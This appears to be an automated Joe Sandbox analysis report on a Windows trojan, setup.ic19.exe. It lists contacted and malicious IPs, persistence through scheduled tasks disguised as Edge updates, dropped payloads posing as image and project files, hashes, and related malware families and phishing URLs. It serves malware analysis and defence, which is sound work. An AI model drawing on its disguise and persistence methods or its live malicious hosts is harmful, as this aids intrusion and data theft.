https://101oss.oss-cn-beijing.aliyuncs.com/	setup.ic19.exe, 00000000.00000003.1900207800.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900207800.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1900207800.0000000000611000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000609000.00000004.00000020.00020000.00000000.sdmp, setup.ic19.exe, 00000000.00000003.1874118144.0000000000611000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
47.76.31.57	unknown	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	true
39.103.20.76	sc-2ikp.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
118.178.60.61	sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523811
Start date and time:	2024-10-02 04:26:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.ic19.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/35@14/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 59% Number of executed functions: 136 Number of non-executed functions: 253
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3960 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:27:43	Task Scheduler	Run new task: x8zc6 path: C:\Users\user\AppData\Roaming\8AfroU.exe
03:28:57	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 IthvQ path: C:\Program Files (x86)\eL62Gl4\80c2T80R.exe
03:28:57	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 RF3qI path: C:\Program Files (x86)\lXAMaI\lXAMaI.exe
22:28:46	API Interceptor	8642x Sleep call for process: 8AfroU.exe modified
22:29:30	API Interceptor	6129x Sleep call for process: lXAMaI.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	https://whtasapp-ky.com/	Get hash	malicious	Unknown	Browse	47.76.254.147
	file.exe	Get hash	malicious	GhostRat, Mimikatz	Browse	47.76.175.95
	https://whsotsapp.com/	Get hash	malicious	Unknown	Browse	47.76.254.147
	https://alie.kr/8IuPro4	Get hash	malicious	Unknown	Browse	104.84.57.202
	https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/zoe-elefterin.com/M%2f13303%2FcXJzYy1xdWFsaXR5cmVwb3J0aW5nc2VydmljZWNlbnRlcmdyb3VwbWFpbGJveEBycmIuZ292	Get hash	malicious	HTMLPhisher	Browse	104.84.56.104
	https://login-wsapp.shop/	Get hash	malicious	Unknown	Browse	47.76.213.192
	SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elf	Get hash	malicious	Mirai	Browse	47.78.236.62
	https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173	Get hash	malicious	Unknown	Browse	47.79.49.189
	QSFD.exe	Get hash	malicious	FormBook	Browse	47.76.218.182
	x86.elf	Get hash	malicious	Unknown	Browse	47.76.211.44
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	7kSftA4Eoh.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	8.130.42.227
	mtgjyX9gHF.exe	Get hash	malicious	Quasar	Browse	39.102.36.209
	e4wLi4tmmo.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.120.3.3
	https://ebaite.cn/	Get hash	malicious	Unknown	Browse	120.25.112.99
	SecuriteInfo.com.FileRepMalware.23518.16980.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	106.14.141.209
	d3r1KVj317.exe	Get hash	malicious	Unknown	Browse	112.74.185.5
	http://aa5aa5aa5aa5aa44.app/	Get hash	malicious	Unknown	Browse	59.82.132.217
	http://hbyczyz.com/xrr	Get hash	malicious	Unknown	Browse	47.108.5.198
	http://www.tpckn.app/	Get hash	malicious	Unknown	Browse	203.107.62.140
	http://alibinaadi.com/.well-known/alibaba/Alibaba/index.php	Get hash	malicious	Unknown	Browse	59.82.33.225
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	7kSftA4Eoh.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	8.130.42.227
	mtgjyX9gHF.exe	Get hash	malicious	Quasar	Browse	39.102.36.209
	e4wLi4tmmo.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.120.3.3
	https://ebaite.cn/	Get hash	malicious	Unknown	Browse	120.25.112.99
	SecuriteInfo.com.FileRepMalware.23518.16980.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	106.14.141.209
	d3r1KVj317.exe	Get hash	malicious	Unknown	Browse	112.74.185.5
	http://aa5aa5aa5aa5aa44.app/	Get hash	malicious	Unknown	Browse	59.82.132.217
	http://hbyczyz.com/xrr	Get hash	malicious	Unknown	Browse	47.108.5.198
	http://www.tpckn.app/	Get hash	malicious	Unknown	Browse	203.107.62.140
	http://alibinaadi.com/.well-known/alibaba/Alibaba/index.php	Get hash	malicious	Unknown	Browse	59.82.33.225

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	39.103.20.76 118.178.60.61
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	39.103.20.76 118.178.60.61
	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	39.103.20.76 118.178.60.61
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	39.103.20.76 118.178.60.61
	Version.130.2482.15.js	Get hash	malicious	Unknown	Browse	39.103.20.76 118.178.60.61
	Shipping documents 000288488599900.img	Get hash	malicious	GuLoader	Browse	39.103.20.76 118.178.60.61
	Passport and card.vbs	Get hash	malicious	Unknown	Browse	39.103.20.76 118.178.60.61
	r20240913TRANSFERENCIA.vbs	Get hash	malicious	GuLoader	Browse	39.103.20.76 118.178.60.61
	app__v7.3.5_.msi	Get hash	malicious	Unknown	Browse	39.103.20.76 118.178.60.61
	e.dll	Get hash	malicious	Dridex Dropper	Browse	39.103.20.76 118.178.60.61

Process:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\eL62Gl4\log.src

Download File

Process:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5015141
Entropy (8bit):	7.999952801741647
Encrypted:	true
SSDEEP:	98304:zFezgMpLkskQHBYnGAgfCQrEVqGg5TSvikyZUWlGNVcuasfH7Grbq:JecMpLMQH+GdPAqGAT/VUaGVSrbq
MD5:	D72786D538380C39DABC1B3A349FE781
SHA1:	6A11C22B76C27CEEF649A816FB0B41A508BC838E
SHA-256:	5F706A5946C624DDBA8359E17708558A937E38BF7133D9DC959CFE7AEED70494
SHA-512:	276B03C49AE254B69502C4BD473F6E90AA10C9B1CB48A552F992722FA0B90FFBAB2BE68E3F2E56393E59F76644E996E963E89D9DEC30CEB007F581BC2B4731C4
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............x....&#IDATx....(`....t.),.............Rf&................................................................................................~.a...Y..c..p.^...~...S.iO3..=U.\4{Y.v].o.....^k.....v.}..^.b.~Zd..0....?llL....s.6....A......88;8L...5)k\.O...kHi...=..h.Z3z>......JP..l(Q........k.%`"b.[_...Pg.......%50....(0.8.....@.....dAc...OD.s.z.z...b.{..N.N....0......>......f...d...%"~...1....E....."f.1C.3.....[m.up..l....D..=T..!7.....{.s......["b...OD....2..&.2.4.CK..U.G...="bK./D._....Y.1M.#...yl...........#q''...M...i4.X.,!..}v..o._.....C..D....M_.. _..'.+.).e...s..M".'{..cgq.q.7.Kp!.'%.rm.....i.h..b.$r.J..F..R..^..U......"R.....g.M.M.&$.K.. A...bR"R..^.yv..z.L}..........g...... ...s.y..p>^.\|....E.R......n.@.;..P.fu.\|.....7)Z.bux.h.;.....6.K....6oF..\|L3.@_^".@.k.~.B.c..fo<d....\|.....Do.Qh....t>...P...K.q....u....w](....l.fB]\.w>.....3?......k?.....qP...e....GL......k.O.e.&A.....P]'..<jT.....+.7.*.'.Lw.....S.u.

C:\Program Files (x86)\eL62Gl4\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516696462591
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/8:9S4+O6P5OeMRrjRy7aPZbm3k8V/8
MD5:	39C05BCCBDAAF826C498EABB8BC2492D
SHA1:	4DFE87E5D4F4C5C3F4826259DCB0730C20124DF6
SHA-256:	DBE9E4C548E1E3E1B67186F053240FFC143808B505D19CBC272EF4250F7A32F9
SHA-512:	566499267AABA5491B7550E51AF854365B1F1333C0F38006341DF0DE3264381E1FED8B61F433419ADF2090D51DAB04894D86D39F9402756F26967BC2A587FA15
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\eL62Gl4\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\lXAMaI\lXAMaI.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399736552087
Encrypted:	true
SSDEEP:	6144:uiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:h8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	1E939A5715954ED6615BD1C3D233B11A
SHA1:	ACDB142643969023C2A7A90A129C74B8FEB8DA8F
SHA-256:	C4CDA38BA9A17DEFB8964C4F8E3C880EA6B229126A9E4E721BCFDC5B93665C7A
SHA-512:	624A9A79959A499831FE441C4BDA7348DDFB3B2D3682A36C7C1573EC2149CF9DBD6030225343F1CA77E0446816270DFA802BDFFC460B5A91AAC4658FD4D2CE4E
Malicious:	false
Reputation:	low
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF47.76.31.57......#ijstuvwxyz....hteyov.net.......#..............31.57.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\lXAMaI\lXAMaI.exe

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\lXAMaI\log.src

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5015141
Entropy (8bit):	7.9999527989868
Encrypted:	true
SSDEEP:	98304:MFezgMpLkskQHBYnGAgfCQrEVqGg5TSvikyZUWlGNVcuasfH7Grbq:KecMpLMQH+GdPAqGAT/VUaGVSrbq
MD5:	EA5279F5C555DEC6F0171D5C2F6890EE
SHA1:	C0B681BB432A3CDD76ED14A77D62D360D76534D0
SHA-256:	F41C65BD3269B06D2DB0ED48125CD9C6A68C813845EB2C94EC4EDB796BD75949
SHA-512:	AF46D43ED298FBBA5A88E2A8D76F9834B5BB293E0FCFCAACEB3EFFCAE0D593E63793DFA36816F10C16DE3B4EB2EEEFCE5CEF7D99DC9907D44F2745A4DD9CC29B
Malicious:	false
Preview:	.PNG........IHDR..............x....&#IDATx....(`....t.),.............Rf&................................................................................................~.a...Y..c..p.^...~...S.iO3..=U.\4{Y.v].o.....^k.....v.}..^.b.~Zd..0....?llL....s.6....A......88;8L...5)k\.O...kHi...=..h.Z3z>......JP..l(Q........k.%`"b.[_...Pg.......%50....(0.8.....@.....dAc...OD.s.z.z...b.{..N.N....0......>......f...d...%"~...1....E....."f.1C.3.....[m.up..l....D..=T..!7.....{.s......["b...OD....2..&.2.4.CK..U.G...="bK./D._....Y.1M.#...yl...........#q''...M...i4.X.,!..}v..o._.....C..D....M_.. _..'.+.).e...s..M".'{..cgq.q.7.Kp!.'%.rm.....i.h..b.$r.J..F..R..^..U......"R.....g.M.M.&$.K.. A...bR"R..^.yv..z.L}..........g...... ...s.y..p>^.\|....E.R......n.@.;..P.fu.\|.....7)Z.bux.h.;.....6.K....6oF..\|L3.@_^".@.k.~.B.c..fo<d....\|.....Do.Qh....t>...P...K.q....u....w](....l.fB]\.w>.....3?......k?.....qP...e....GL......k.O.e.&A.....P]'..<jT.....+.7.*.'.Lw.....S.u.

C:\Program Files (x86)\lXAMaI\tbcore3U.dll

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517239675957
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/g:9S4+O6P5OeMRrjRy7aPZbm3k8V/g
MD5:	8426651BEB8091DA0CCBC8BA937F5AFF
SHA1:	510A9331A767DEA4B970CC4A0C35E5E229DC3ED0
SHA-256:	FBEA0F7EEA771D484C5914FBFC304D8402D1C0FD62A9D1A9BF0E6C883484902E
SHA-512:	5DAEEE156EE5793DFB4B4C07D40643B2CB20ABEE28A0FAD6C16732D90D92F8813DFEA20A266D3DF591573B83FF78A038B42B2EE8C83B89092E38E9DC989CDCEB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\lXAMaI\utils.vcxproj

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.99939957205201
Encrypted:	true
SSDEEP:	6144:aiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:F8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	48867128C645BD898DE8C34BC13DEEE9
SHA1:	63355089A2FFA048DE8DB0F5CA3209981FE64ED8
SHA-256:	B5621E7F751B8E1E68FC2E500A6AA247C3EDD81493183D0567E07D9021A49B27
SHA-512:	EB96D89F325AD6EB8F3B3E96E6CE8B59DBC492AE8618D6F755D04983A32A7E077634FEEB40465949C95D0FB83E953077D8888E63532DD78D9A1C02B5002D999A
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF47.76.31.57......#ijstuvwxyz....hteyov.net.......#..............31.57.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3948026
Entropy (8bit):	7.994198969625652
Encrypted:	true
SSDEEP:	98304:NCof/JQ3KUKG8vAXFaAndbmmhvzQHY7LfpXxwhSa2:WKUQAx1mUvzQ47Tfi2
MD5:	C5E65833E6AB5D296AE3CC936BF95FCD
SHA1:	67579ADD654DF29941CC6E4B55FB805E144A3BFC
SHA-256:	59534DF7A0F86699D4F83D56FD225C856EC275B79BE1FA9B186B9583279116D1
SHA-512:	32623ACCFFE085DA4954D0D716F5D163F0D5791EC4CB247AABA2230D3CB63C3348966E7E6A5FB8362DFF7201361A3E97D7395BAEB30C4C7102C5D1442AC42732
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\AppData\Roaming\8AfroU.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.585523659886944
Encrypted:	false
SSDEEP:	6:JRSscaVAQ7FghswY+ZcRC6szmrdimzY8VAQT7LE/o2xjC:fSscaVHYRY+ZcReadimzPV/OY
MD5:	886FA7DA4E35CC558232C567D89921B9
SHA1:	B23F049EB6CA732FA5C1DDE1C428E27464C7C5C5
SHA-256:	BCAD0ADCB0FA709F8816C8EB523212A8D20FF168391C8ACC5296095D7A9357C6
SHA-512:	E2D5EF781A8222C56FD830BE0972A6577620E1BD838315B2255DF26069B3955E91D7336E8959EA62AAE9F258F661DEF201966ECF2C16515A59EABE2746C7F8CE
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyHI..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzKJ..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxIH..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyHI..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\setup.ic19.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.391578267124565
Encrypted:	false
SSDEEP:	6:WOlzJwaTcR/nq+9CrCa2BIDRsw6d+HXV8j8zp7OdUzW+6hkn:DwYcRy+GMBIDRswlzNgUzW+1
MD5:	699393BAABBB9ADBE93FAC039FB9E84D
SHA1:	220F0F5D7051081D1E03AF4FF786C54C81B57B8E
SHA-256:	9F69BB537F82784A10AAC7C382319E06E801302944F7D4761732ED40D5BBAC7E
